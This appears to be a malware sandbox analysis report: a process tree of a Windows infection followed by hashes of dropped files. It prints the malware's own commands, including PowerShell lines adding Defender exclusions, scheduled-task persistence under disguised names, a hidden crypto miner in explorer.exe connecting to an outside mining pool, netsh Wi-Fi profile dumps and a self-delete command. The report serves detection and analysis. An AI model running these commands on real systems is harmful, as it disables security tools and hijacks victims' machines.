- Suspicious use of AdjustPrivilegeToken
-
C:\windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit4⤵
-
\??\c:\windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'5⤵
- Creates scheduled task(s)
-
C:\windows\system32\microsoft\libs\sihost64.exe"C:\windows\system32\microsoft\libs\sihost64.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
-
C:\windows\system32\defendernottray.exe"C:\windows\system32\defendernottray.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit6⤵
-
\??\c:\windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'7⤵
- Creates scheduled task(s)
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=67.242.2.35:3333 --user=CMRBKYMNO --pass= --cpu-max-threads-hint=70 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CJ80EuZhDq7w3QiPw3/9PYjASC1sXGu0nCxs9jooG2T" --cinit-idle-wait=12 --cinit-idle-cpu=90 --nicehash --cinit-stealth6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=67.242.2.35:3333 --user=CMRBKYMNO --pass= --cpu-max-threads-hint=70 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CJ80EuZhDq7w3QiPw3/9PYjASC1sXGu0nCxs9jooG2T" --cinit-idle-wait=12 --cinit-idle-cpu=90 --nicehash --cinit-stealth4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit3⤵
-
C:\windows\system32\trayfontdefender.exe"C:\windows\system32\trayfontdefender.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit4⤵
-
\??\c:\windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'5⤵
- Creates scheduled task(s)
-
C:\windows\system32\microsoft\telemetry\sihost32.exe"C:\windows\system32\microsoft\telemetry\sihost32.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe"C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1760 -s 17003⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid4⤵
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
-
C:\Windows\system32\findstr.exefindstr All4⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"3⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\skgrznb1.cmdline"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8170.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8141.tmp"4⤵
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install3⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\lsddsds\lsdds.exe"C:\Windows\lsddsds\lsdds.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\olsdd.exe"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /launchSelfAndExit "C:\Windows\lsddsds\lsdds.exe" 2544 /protectFile4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\olsdd.exe"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /watchProcess "C:\Windows\lsddsds\lsdds.exe" 2544 "/protectFile"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'1⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe"1⤵
- Executes dropped EXE
-
C:\Windows\system32\taskeng.exetaskeng.exe {92DAC03C-4ABA-456B-9156-3512B67ACD14} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵
-
C:\Windows\lsddsds\lsdds.exeC:\Windows\lsddsds\lsdds.exe2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ee75929-98e1-4ef4-9a32-6401cbbdbcf3MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2e3388e5-f018-49d0-b592-5e28f5493289MD5
e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3fdebb3c-7ec9-4206-80d2-87d066cbcc85MD5
6f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b0defdc-6cb5-4f1e-a1ef-96ce0aa8443bMD5
2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c35972d8-5622-4c80-b085-1ca35b9af862MD5
faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_def3f345-da71-4c4a-9419-803178e10508MD5
d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb48f16a-da2f-4af8-bb52-101940582f49MD5
7f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
c3374a04eb6c701ebc3bf582fda64507
SHA1cb93d99aa064fd81674ea04f6f450f14767002e4
SHA2561a086cc0a4954ed8a3f0099ba287c7c231a8b9a0b7f532701bb4fb871e6113a9
SHA5123fdbcf3b44a66c90d61975c678bd0cf8e0df8b84d910b3e225d647b5772b98027f9edf07c0f9d32a40f8f8df9fd264deadf7fc8d6d16a669158d44adf67a9fe8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
dcc52ac5ad7569b2c0b54df3720d21a4
SHA133169bdc6a69fb4c26f54d5446ade26f7fb1c796
SHA25644633c61970fc10c8b22900012fbdf8ddd36960f0b93612f4a076c2e6e70a991
SHA512b86001478384bac21a3dfac59958c9f1c67bb8d6b9127176140e35b710d29a16be3dee8eb8180d5bc8efc0543c6a8593253e03974579d53b30392c4488109dc4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
dcc52ac5ad7569b2c0b54df3720d21a4
SHA133169bdc6a69fb4c26f54d5446ade26f7fb1c796
SHA25644633c61970fc10c8b22900012fbdf8ddd36960f0b93612f4a076c2e6e70a991
SHA512b86001478384bac21a3dfac59958c9f1c67bb8d6b9127176140e35b710d29a16be3dee8eb8180d5bc8efc0543c6a8593253e03974579d53b30392c4488109dc4
-
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exeMD5
f66e55cb2019425ba694948cc0355560
SHA130d2e88f4da43baa0055ce592bbdbd13e0f7244a
SHA2568439ef55f6eabc62d3c9d4a3cfe1ef042b48e6718c61bc0d834084b8c1b8bbe7
SHA512e3c00a56758a26ea786b030fcd6ab6cb42282d252cca6d07003639354fb35f9444f6cc535f3b0bf02d8426b88d4b18edec506644d4b2d2a6fe792d3b93bbaa23
-
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exeMD5
f66e55cb2019425ba694948cc0355560
SHA130d2e88f4da43baa0055ce592bbdbd13e0f7244a
SHA2568439ef55f6eabc62d3c9d4a3cfe1ef042b48e6718c61bc0d834084b8c1b8bbe7
SHA512e3c00a56758a26ea786b030fcd6ab6cb42282d252cca6d07003639354fb35f9444f6cc535f3b0bf02d8426b88d4b18edec506644d4b2d2a6fe792d3b93bbaa23
-
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exeMD5
ad8e052d00bfc89e09c047f048ea63da
SHA1c1d0dba06f790d20794039970fe61d94479ee6f9
SHA256ccecc3771947e3767dc9b0eb36f34886237e5c3aca60de94a610a6d81f93f9ab
SHA512b8ba4b34279406939df8d37a6934b9f406e782fc9202b825cd34d4c9e4e6d70748505a6aadc0ed2d114d8f2220cd80b83780909fe582781981f842fbbb79909b
-
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exeMD5
ad8e052d00bfc89e09c047f048ea63da
SHA1c1d0dba06f790d20794039970fe61d94479ee6f9
SHA256ccecc3771947e3767dc9b0eb36f34886237e5c3aca60de94a610a6d81f93f9ab
SHA512b8ba4b34279406939df8d37a6934b9f406e782fc9202b825cd34d4c9e4e6d70748505a6aadc0ed2d114d8f2220cd80b83780909fe582781981f842fbbb79909b
-
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exeMD5
2ed63566ece20dbdfbb8bed11e075ddc
SHA1b7d411fa43c83fceabc557368edab88c23b0a5c7
SHA256a7c70d3c35b9776c8ca407bb26250435b8e3beeedcc213b7fe6d98f12ca2a99a
SHA512a5787d3aaf3f9abf9b09d25c25aa95b3735c7f8a26eeef8775f58349dc6266dac032c36b602236197b553c61bb4958cdd8091047171a895d107aca89f8e2ec69
-
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exeMD5
2ed63566ece20dbdfbb8bed11e075ddc
SHA1b7d411fa43c83fceabc557368edab88c23b0a5c7
SHA256a7c70d3c35b9776c8ca407bb26250435b8e3beeedcc213b7fe6d98f12ca2a99a
SHA512a5787d3aaf3f9abf9b09d25c25aa95b3735c7f8a26eeef8775f58349dc6266dac032c36b602236197b553c61bb4958cdd8091047171a895d107aca89f8e2ec69
-
C:\Users\Admin\AppData\Local\Temp\RES8170.tmpMD5
1157eaca5097d5da8f5fdd9e3c8306cf
SHA183c0824e453af48def2095018221e818431a48c7
SHA256bae5d933cfafa88f01547654e9460294a0a379699e59f669b6a67a629d095c53
SHA512d44ea8fe38dc34626f47981c7e4077bd0303db44aa1855280ac2f7d92c1e9ca7bd65f9d63e1f622b1acdeede2b1feeac7b00a6f1d9de60eedef35f2f998eca79
-
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exeMD5
1396c4279e7dd5e24be782c88871fed3
SHA1f3d1eca6c761a69e25c6aa592116edbb817a8aad
SHA2566bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310
SHA512331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3
-
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exeMD5
1396c4279e7dd5e24be782c88871fed3
SHA1f3d1eca6c761a69e25c6aa592116edbb817a8aad
SHA2566bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310
SHA512331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3
-
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exeMD5
5ec2741199ca8f45f24e4d1f943df63d
SHA1c72b4d4ca24bee746106611268ff1b85461aa561
SHA256444fd5ca27eece8893d52dffa5f94a149175d6bc8904a109009506b03dc4e6b3
SHA512e48545dbf9b1df4ca20b964a90358a01fcbd2f7ec7af0fdc03e4a42074ae490c646b0b4b091775ff7c88a33361e72d3794df6cbbfb450ca7f68f0f12f58de523
-
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exeMD5
5ec2741199ca8f45f24e4d1f943df63d
SHA1c72b4d4ca24bee746106611268ff1b85461aa561
SHA256444fd5ca27eece8893d52dffa5f94a149175d6bc8904a109009506b03dc4e6b3
SHA512e48545dbf9b1df4ca20b964a90358a01fcbd2f7ec7af0fdc03e4a42074ae490c646b0b4b091775ff7c88a33361e72d3794df6cbbfb450ca7f68f0f12f58de523
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exeMD5
32f61892924acfadb0a93c3fdbdde02f
SHA1dc9f82ec9db0225cbf88521739160a31b15d4a9e
SHA25669caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5
SHA512f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exeMD5
32f61892924acfadb0a93c3fdbdde02f
SHA1dc9f82ec9db0225cbf88521739160a31b15d4a9e
SHA25669caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5
SHA512f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37
-
C:\Users\Admin\AppData\Local\Temp\_MEI19522\python39.dllMD5
5cd203d356a77646856341a0c9135fc6
SHA1a1f4ac5cc2f5ecb075b3d0129e620784814a48f7
SHA256a56afcf5f3a72769c77c3bc43c9b84197180a8b3380b6258073223bfd72ed47a
SHA512390008d57fa711d7c88b77937bf16fdb230e7c1e7182faea6d7c206e9f65ced6f2e835f9da9befb941e80624abe45875602e0e7ad485d9a009d2450a2a0e0f1f
-
C:\Users\Admin\AppData\Local\Temp\python\python.exeMD5
97a51fcdffeac1ea53ede5c91607a73e
SHA11c95c43b104a7faa79691714556c2c7b5d153697
SHA2560c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26
SHA512e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7
-
C:\Users\Admin\AppData\Local\Temp\python\python.exeMD5
97a51fcdffeac1ea53ede5c91607a73e
SHA11c95c43b104a7faa79691714556c2c7b5d153697
SHA2560c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26
SHA512e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7
-
C:\Users\Admin\AppData\Local\Temp\python\python.exeMD5
97a51fcdffeac1ea53ede5c91607a73e
SHA11c95c43b104a7faa79691714556c2c7b5d153697
SHA2560c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26
SHA512e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7
-
C:\Users\Admin\AppData\Local\Temp\skgrznb1.dllMD5
cc8c52084dd8442cfec324b2127b0f1a
SHA1d04ea4d28780d3bce813906521bd950479e0cae9
SHA2562cad56f0003f22e73faeed01a63648790e5bcd2687d76f8e2ae21ab2853e9408
SHA5127adaa4ae0f2d0942ad5b2d0d33e1a81b3a1abef8ca827b6ef70a265bfb682092ac48de9a6344be302ee5ab0c54d4ab63be805be15b44355d463a133f067288da
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
a841d474e0abe2ec39bcafcf4c6531de
SHA1475bc57b287dca707c0647d82e73e4798d7c5260
SHA2566d5213bfc70635801443d0956ffb075ec4bb29c7618736306744ef6d58a2a424
SHA512e03ce40f8f081be9310af9fb17d701febca10e658a90b2788006a0552b2ebfe5150948b7d0df8ea9833a3890e57d5ef8a00ca28de546009954b07ef6caf7e28b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
a841d474e0abe2ec39bcafcf4c6531de
SHA1475bc57b287dca707c0647d82e73e4798d7c5260
SHA2566d5213bfc70635801443d0956ffb075ec4bb29c7618736306744ef6d58a2a424
SHA512e03ce40f8f081be9310af9fb17d701febca10e658a90b2788006a0552b2ebfe5150948b7d0df8ea9833a3890e57d5ef8a00ca28de546009954b07ef6caf7e28b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
a841d474e0abe2ec39bcafcf4c6531de
SHA1475bc57b287dca707c0647d82e73e4798d7c5260
SHA2566d5213bfc70635801443d0956ffb075ec4bb29c7618736306744ef6d58a2a424
SHA512e03ce40f8f081be9310af9fb17d701febca10e658a90b2788006a0552b2ebfe5150948b7d0df8ea9833a3890e57d5ef8a00ca28de546009954b07ef6caf7e28b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
a841d474e0abe2ec39bcafcf4c6531de
SHA1475bc57b287dca707c0647d82e73e4798d7c5260
SHA2566d5213bfc70635801443d0956ffb075ec4bb29c7618736306744ef6d58a2a424
SHA512e03ce40f8f081be9310af9fb17d701febca10e658a90b2788006a0552b2ebfe5150948b7d0df8ea9833a3890e57d5ef8a00ca28de546009954b07ef6caf7e28b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
da9a917db934eab0b8655cc3409dca64
SHA11805ec34868b286efc679071f631b0d59ce551b8
SHA25690a5a6d79024062fb947fdb853892f93a4186dd099260c475b7df0a75ab61858
SHA5122f97a7b5daff3f6ba6c0b58dc3405da2433915d03a7d1b3a633c4245d0e5cd3f1e485c536d8a6bc76405e4db654f4d8276a4a87b0048aec9d56741e23ab9c2a0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
da9a917db934eab0b8655cc3409dca64
SHA11805ec34868b286efc679071f631b0d59ce551b8
SHA25690a5a6d79024062fb947fdb853892f93a4186dd099260c475b7df0a75ab61858
